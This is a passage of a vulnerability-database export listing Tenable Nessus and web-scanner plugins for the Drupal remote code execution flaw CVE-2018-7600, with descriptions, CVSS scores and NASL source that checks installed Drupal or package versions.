'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700230.PRM", "href": "https://www.tenable.com/plugins/nnm/700230", "sourceData": "Binary data 700230.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 8.4.x prior to 8.4.6, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700229.PRM", "href": "https://www.tenable.com/plugins/nnm/700229", "sourceData": "Binary data 700229.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T14:35:13", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.3.9 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98566", "href": "https://www.tenable.com/plugins/was/98566", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:35:06", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98570", "href": "https://www.tenable.com/plugins/was/98570", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:20", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98569", "href": "https://www.tenable.com/plugins/was/98569", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:34:49", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98564", "href": "https://www.tenable.com/plugins/was/98564", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:19", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98567", "href": "https://www.tenable.com/plugins/was/98567", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:14:36", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9, 8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-28T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/108688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108688);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Drupal 7.x < 7.58 / 8.3.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution Vulnerability (SA-CORE-2018-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.58, 8.3.x prior to 8.3.9,\n8.4.x prior to 8.4.6, or 8.5.x prior to 8.5.1. It is, therefore,\naffected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.58 / 8.3.9 / 8.4.6 / 8.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7600\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.57\", \"fixed_version\" : \"7.58\" },\n { \"min_version\" : \"8.3.0\", \"max_version\" : \"8.3.8\", \"fixed_version\" : \"8.3.9\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.5\", \"fixed_version\" : \"8.4.6\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.0\", \"fixed_version\" : \"8.5.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:16:28", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:17:20", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-002", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4156.NASL", "href": "https://www.tenable.com/plugins/nessus/108698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4156. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108698);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"DSA\", value:\"4156\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DSA-4156-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4156\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:19:50", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 